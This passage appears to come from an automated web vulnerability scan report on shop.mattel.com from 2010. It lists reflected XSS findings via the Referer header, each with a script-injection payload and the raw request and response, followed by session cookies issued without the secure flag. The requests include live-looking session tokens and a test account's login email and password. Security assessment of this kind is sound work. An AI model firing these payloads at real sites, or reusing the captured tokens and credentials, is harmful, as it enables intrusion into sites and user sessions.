1.76. http://shop.mattel.com/history/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /history/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb3"><script>alert(1)</script>fe48f0b8dca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /history/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:34 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45088


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca;u2=1;u3=;u1=;ord=1;num=33774843?" width="1" height="1" frameborder="0">
...[SNIP]...

1.77. http://shop.mattel.com/home/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129a5"><script>alert(1)</script>d516d332891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:51 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45370


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891;u2=1;u3=;u1=;ord=1;num=32562816?" width="1" height="1" frameborder="0">
...[SNIP]...

1.78. http://shop.mattel.com/product/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b892"><script>alert(1)</script>2213eb59c24 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:48 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45312


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24;u2=1;u3=;u1=;ord=1;num=60684825?" width="1" height="1" frameborder="0">
...[SNIP]...

1.79. http://shop.mattel.com/search/controller.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c6f"><script>alert(1)</script>27e45151b39 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:35 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45183


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39;u2=1;u3=;u1=3747401524;ord=1;num=17518156?" width="1" height="1" frameborder="0">
...[SNIP]...

1.80. http://shop.mattel.com/shop/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>a8c907b55ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/index.jsp?categoryId=3719992 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39040


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff;u2=5;u3=;u1=;ord=1;num=82099516?" width="1" height="1" frameborder="0">
...[SNIP]...

2. SSL cookie without secure flag set
There are 11 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://shop.mattel.com/affiliate/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=bGkwNSJQK1gxnpPZcfpDGyz9DBWqmgjmKFr3FtyLQYQJNGQ2yfF2!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38474


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

2.2. https://shop.mattel.com/brand/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brand/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vXThNSJGvphcGlG0d0LJVTlQkpRwpfvpyMkBCbTY3tRF30zxYTN0!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36834


                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...

2.3. https://shop.mattel.com/cart/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/cart/index.jsp
Set-Cookie: JSESSIONID=TG2TNSJLw8tNpQytl4Ltw1WL82GGTGkRD2vPLnj1GMtCSh4GnV1t!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/cart/index.
...[SNIP]...

2.4. https://shop.mattel.com/coreg/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /coreg/index.jsp HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Origin: https://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}
Content-Length: 61

step=login&email=test%40fastdial.net&password=SkipIt1&x=0&y=0

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:11:07 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 315

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

2.5. https://shop.mattel.com/coreg/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=logout HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 305

<html><head><title>302 Moved Temporarily</title></head>
